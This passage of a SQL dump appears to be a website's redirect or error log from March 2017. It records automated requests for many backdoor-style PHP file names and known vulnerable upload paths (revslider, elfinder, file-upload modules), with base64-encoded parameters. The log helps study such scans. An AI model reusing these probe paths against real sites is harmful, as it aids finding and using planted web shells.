00:00:00'),(7126,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=OUdSREJ2LnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:45:28','0000-00-00 00:00:00'),(7127,'http://hallcrestheights.org/resd.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:45:30','0000-00-00 00:00:00'),(7128,'http://hallcrestheights.org/injctory.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:45:34','0000-00-00 00:00:00'),(7129,'http://hallcrestheights.org/mmytc.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:45:38','0000-00-00 00:00:00'),(7130,'http://hallcrestheights.org/M-F4r3s.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:45:40','0000-00-00 00:00:00'),(7131,'http://hallcrestheights.org/images/laj.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:45:43','0000-00-00 00:00:00'),(7132,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:46:08','0000-00-00 00:00:00'),(7133,'http://hallcrestheights.org/wsdl.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:47:40','0000-00-00 00:00:00'),(7134,'http://hallcrestheights.org/goog1es.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:49:28','0000-00-00 00:00:00'),(7135,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=OUdSREJ2LnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:49:49','0000-00-00 00:00:00'),(7136,'http://hallcrestheights.org/update.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:50:43','0000-00-00 00:00:00'),(7137,'http://hallcrestheights.org/news.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:51:56','0000-00-00 00:00:00'),(7138,'http://hallcrestheights.org/SessionController.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:52:38','0000-00-00 00:00:00'),(7139,'http://hallcrestheights.org/maill.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:53:17','0000-00-00 00:00:00'),(7140,'http://hallcrestheights.org/error-log.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:53:24','0000-00-00 00:00:00'),(7141,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:53:51','0000-00-00 00:00:00'),(7142,'http://hallcrestheights.org/authenticating.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:54:25','0000-00-00 00:00:00'),(7143,'http://hallcrestheights.org/google-assist.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:54:38','0000-00-00 00:00:00'),(7144,'http://hallcrestheights.org/images/google-assist.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:55:50','0000-00-00 00:00:00'),(7145,'http://hallcrestheights.org/images/robots.txt.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:55:52','0000-00-00 00:00:00'),(7146,'http://hallcrestheights.org/elements.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:55:57','0000-00-00 00:00:00'),(7147,'http://hallcrestheights.org/xmlsrpc.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:55:59','0000-00-00 00:00:00'),(7148,'http://hallcrestheights.org/wp-cache.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:56:06','0000-00-00 00:00:00'),(7149,'http://hallcrestheights.org/images/404.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:56:12','0000-00-00 00:00:00'),(7150,'http://hallcrestheights.org/images/head.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:56:17','0000-00-00 00:00:00'),(7151,'http://hallcrestheights.org/cache/support.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:56:45','0000-00-00 00:00:00'),(7152,'http://hallcrestheights.org/RoseLeif.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:56:47','0000-00-00 00:00:00'),(7153,'http://hallcrestheights.org/Abbrevsprl.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:56:52','0000-00-00 00:00:00'),(7154,'http://hallcrestheights.org/show.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 05:57:53','0000-00-00 00:00:00'),(7155,'http://hallcrestheights.org/images/defau1t.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 05:59:13','0000-00-00 00:00:00'),(7156,'http://hallcrestheights.org/infos.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:05:52','0000-00-00 00:00:00'),(7157,'http://hallcrestheights.org/cache/defau1t.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:05:58','0000-00-00 00:00:00'),(7158,'http://hallcrestheights.org/A.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:06:26','0000-00-00 00:00:00'),(7159,'http://hallcrestheights.org/bookmark.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:06:30','0000-00-00 00:00:00'),(7160,'http://hallcrestheights.org/wp-data.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:09:52','0000-00-00 00:00:00'),(7161,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:10:39','0000-00-00 00:00:00'),(7162,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:10:41','0000-00-00 00:00:00'),(7163,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:12:25','0000-00-00 00:00:00'),(7164,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:12:40','0000-00-00 00:00:00'),(7165,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:13:14','0000-00-00 00:00:00'),(7166,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',3,0,'2017-03-04 06:14:12','0000-00-00 00:00:00'),(7167,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:14:17','0000-00-00 00:00:00'),(7168,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:15:36','0000-00-00 00:00:00'),(7169,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:15:42','0000-00-00 00:00:00'),(7170,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:15:56','0000-00-00 00:00:00'),(7171,'http://hallcrestheights.org/head.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:16:03','0000-00-00 00:00:00'),(7172,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:18:27','0000-00-00 00:00:00'),(7173,'http://hallcrestheights.org/cache/list.php?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:18:30','0000-00-00 00:00:00'),(7174,'http://hallcrestheights.org/images/interface.php?z3=OUdSREJ2LnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:18:54','0000-00-00 00:00:00'),(7175,'http://hallcrestheights.org/sqldebug.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:19:24','0000-00-00 00:00:00'),(7176,'http://hallcrestheights.org/xmlrpc-activate.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:19:26','0000-00-00 00:00:00'),(7177,'http://hallcrestheights.org/keep.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:20:39','0000-00-00 00:00:00'),(7178,'http://hallcrestheights.org/tmpos.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:21:31','0000-00-00 00:00:00'),(7179,'http://hallcrestheights.org/link.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:21:37','0000-00-00 00:00:00'),(7180,'http://hallcrestheights.org/dcodzu.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:21:41','0000-00-00 00:00:00'),(7181,'http://hallcrestheights.org/codd.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:21:45','0000-00-00 00:00:00'),(7182,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=OUdSREJ2LnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:23:43','0000-00-00 00:00:00'),(7183,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=OUdSREJ2LnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:23:53','0000-00-00 00:00:00'),(7184,'http://hallcrestheights.org/content.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:23:57','0000-00-00 00:00:00'),(7185,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:24:00','0000-00-00 00:00:00'),(7186,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:24:38','0000-00-00 00:00:00'),(7187,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=OUdSREJ2LnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:25:56','0000-00-00 00:00:00'),(7188,'http://hallcrestheights.org/shootmei.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-04 06:27:38','0000-00-00 00:00:00'),(7189,'http://hallcrestheights.org/dcodqg.php?z3=OUdSREJ2LnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-04 06:28:23','0000-00-00 00:00:00'),(7190,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/9GRDBv.php',NULL,'','',1,0,'2017-03-04 06:28:25','0000-00-00 00:00:00'),(7191,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/9GRDBv.php',NULL,'','',1,0,'2017-03-04 06:28:27','0000-00-00 00:00:00'),(7192,'http://hallcrestheights.org/wp-content/uploads/9GRDBv.php',NULL,'','',1,0,'2017-03-04 06:28:30','0000-00-00 00:00:00'),(7193,'http://hallcrestheights.org/9GRDBv.php',NULL,'','',1,0,'2017-03-04 06:28:32','0000-00-00 00:00:00'),(7194,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/9GRDBv.php',NULL,'','',1,0,'2017-03-04 06:28:34','0000-00-00 00:00:00'),(7195,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-k42284-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'https://search.yahoo.co.jp/','',5,0,'2017-03-04 11:23:57','0000-00-00 00:00:00'),(7196,'http://hallcrestheights.org/components/com_weblinks/models/setup.php',NULL,'','',7,0,'2017-03-04 14:50:43','0000-00-00 00:00:00'),(7197,'http://hallcrestheights.org/config.php',NULL,'','',10,0,'2017-03-04 22:52:28','0000-00-00 00:00:00'),(7198,'http://www.hallcrestheights.org/admin.php',NULL,'','',8,0,'2017-03-05 13:56:30','0000-00-00 00:00:00'),(7199,'http://hallcrestheights.org/cfg.php',NULL,'','',1,0,'2017-03-05 15:47:34','0000-00-00 00:00:00'),(7200,'http://hallcrestheights.org/index.php/en/?option=com_intranet&view=calendar&month=3&year=1',NULL,'http://www.google.com/','',2,0,'2017-03-06 00:28:34','0000-00-00 00:00:00'),(7201,'http://www.hallcrestheights.org/kzpffms-xklrd-i20162630-edhwge-fvbbgz-agpec-k45473-iyyu/',NULL,'','',10,0,'2017-03-06 00:40:12','0000-00-00 00:00:00'),(7202,'http://hallcrestheights.org/sql-bak.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:29:39','0000-00-00 00:00:00'),(7203,'http://hallcrestheights.org/email.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:29:56','0000-00-00 00:00:00'),(7204,'http://hallcrestheights.org/functions.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:30:05','0000-00-00 00:00:00'),(7205,'http://hallcrestheights.org/cache/news.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:30:25','0000-00-00 00:00:00'),(7206,'http://hallcrestheights.org/tmp.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-03-06 05:30:37','0000-00-00 00:00:00'),(7207,'http://hallcrestheights.org/shootme.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',5,0,'2017-03-06 05:31:37','0000-00-00 00:00:00'),(7208,'http://hallcrestheights.org/configurationbak.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:31:44','0000-00-00 00:00:00'),(7209,'http://hallcrestheights.org/robots.txt.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:31:59','0000-00-00 00:00:00'),(7210,'http://hallcrestheights.org/jconfig.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:32:19','0000-00-00 00:00:00'),(7211,'http://hallcrestheights.org/media/reads.php?z3=MTB0Y1NLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:32:43','0000-00-00 00:00:00'),(7212,'http://hallcrestheights.org/media/1ndex.php?z3=MTB0Y1NLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:32:59','0000-00-00 00:00:00'),(7213,'http://hallcrestheights.org/libraries/joomla/jmails.php?z3=MTB0Y1NLLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:33:11','0000-00-00 00:00:00'),(7214,'http://hallcrestheights.org/sql_dump.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:33:27','0000-00-00 00:00:00'),(7215,'http://hallcrestheights.org/error-logs.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:34:42','0000-00-00 00:00:00'),(7216,'http://hallcrestheights.org/media/404.php?z3=MTB0Y1NLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:34:59','0000-00-00 00:00:00'),(7217,'http://hallcrestheights.org/media/tmp.php?z3=MTB0Y1NLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:35:15','0000-00-00 00:00:00'),(7218,'http://hallcrestheights.org/r3x.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:35:33','0000-00-00 00:00:00'),(7219,'http://hallcrestheights.org/log.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 05:35:51','0000-00-00 00:00:00'),(7220,'http://hallcrestheights.org/images/stories/0day.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 05:36:40','0000-00-00 00:00:00'),(7221,'http://hallcrestheights.org/includes/u2p.php?z3=MTB0Y1NLLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:37:53','0000-00-00 00:00:00'),(7222,'http://hallcrestheights.org/images/xxx.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:38:11','0000-00-00 00:00:00'),(7223,'http://hallcrestheights.org/al277.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:38:29','0000-00-00 00:00:00'),(7224,'http://hallcrestheights.org/roubt.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:38:45','0000-00-00 00:00:00'),(7225,'http://hallcrestheights.org/includes.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:38:55','0000-00-00 00:00:00'),(7226,'http://hallcrestheights.org/images/al277.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:38:58','0000-00-00 00:00:00'),(7227,'http://hallcrestheights.org/webconfig.txt.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:39:01','0000-00-00 00:00:00'),(7228,'http://hallcrestheights.org/cache/cachee.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:39:19','0000-00-00 00:00:00'),(7229,'http://hallcrestheights.org/thumb.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:39:34','0000-00-00 00:00:00'),(7230,'http://hallcrestheights.org/configbak.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:40:23','0000-00-00 00:00:00'),(7231,'http://hallcrestheights.org/wp-main.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:40:33','0000-00-00 00:00:00'),(7232,'http://hallcrestheights.org/robot.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:40:43','0000-00-00 00:00:00'),(7233,'http://hallcrestheights.org/install.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:40:54','0000-00-00 00:00:00'),(7234,'http://hallcrestheights.org/images/1ndex.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:41:05','0000-00-00 00:00:00'),(7235,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=MTB0Y1NLLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:41:15','0000-00-00 00:00:00'),(7236,'http://hallcrestheights.org/resd.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 05:42:11','0000-00-00 00:00:00'),(7237,'http://hallcrestheights.org/injctory.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-03-06 05:42:22','0000-00-00 00:00:00'),(7238,'http://hallcrestheights.org/mmytc.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:43:32','0000-00-00 00:00:00'),(7239,'http://hallcrestheights.org/M-F4r3s.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:43:49','0000-00-00 00:00:00'),(7240,'http://hallcrestheights.org/images/laj.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:44:04','0000-00-00 00:00:00'),(7241,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:44:21','0000-00-00 00:00:00'),(7242,'http://hallcrestheights.org/wsdl.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:44:36','0000-00-00 00:00:00'),(7243,'http://hallcrestheights.org/goog1es.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:44:54','0000-00-00 00:00:00'),(7244,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=MTB0Y1NLLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:45:08','0000-00-00 00:00:00'),(7245,'http://hallcrestheights.org/update.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:45:25','0000-00-00 00:00:00'),(7246,'http://hallcrestheights.org/news.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:45:43','0000-00-00 00:00:00'),(7247,'http://hallcrestheights.org/SessionController.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:46:03','0000-00-00 00:00:00'),(7248,'http://hallcrestheights.org/maill.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:46:24','0000-00-00 00:00:00'),(7249,'http://hallcrestheights.org/error-log.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:47:02','0000-00-00 00:00:00'),(7250,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:47:23','0000-00-00 00:00:00'),(7251,'http://hallcrestheights.org/authenticating.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:47:44','0000-00-00 00:00:00'),(7252,'http://hallcrestheights.org/google-assist.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:48:03','0000-00-00 00:00:00'),(7253,'http://hallcrestheights.org/images/google-assist.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:48:22','0000-00-00 00:00:00'),(7254,'http://hallcrestheights.org/images/robots.txt.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:48:43','0000-00-00 00:00:00'),(7255,'http://hallcrestheights.org/elements.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:49:03','0000-00-00 00:00:00'),(7256,'http://hallcrestheights.org/xmlsrpc.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:49:21','0000-00-00 00:00:00'),(7257,'http://hallcrestheights.org/wp-cache.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:49:37','0000-00-00 00:00:00'),(7258,'http://hallcrestheights.org/images/404.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:49:53','0000-00-00 00:00:00'),(7259,'http://hallcrestheights.org/images/head.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:50:09','0000-00-00 00:00:00'),(7260,'http://hallcrestheights.org/cache/support.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:50:30','0000-00-00 00:00:00'),(7261,'http://hallcrestheights.org/RoseLeif.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:50:46','0000-00-00 00:00:00'),(7262,'http://hallcrestheights.org/Abbrevsprl.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:51:03','0000-00-00 00:00:00'),(7263,'http://hallcrestheights.org/show.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:51:25','0000-00-00 00:00:00'),(7264,'http://hallcrestheights.org/images/defau1t.php?z3=MTB0Y1NLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:51:46','0000-00-00 00:00:00'),(7265,'http://hallcrestheights.org/cli/40dd1d.php?z3=MTB0Y1NLLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:52:06','0000-00-00 00:00:00'),(7266,'http://hallcrestheights.org/bk.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:52:28','0000-00-00 00:00:00'),(7267,'http://hallcrestheights.org/infos.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:53:05','0000-00-00 00:00:00'),(7268,'http://hallcrestheights.org/cache/defau1t.php?z3=MTB0Y1NLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:53:21','0000-00-00 00:00:00'),(7269,'http://hallcrestheights.org/A.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 05:53:44','0000-00-00 00:00:00'),(7270,'http://hallcrestheights.org/bookmark.php?z3=MTB0Y1NLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-03-06 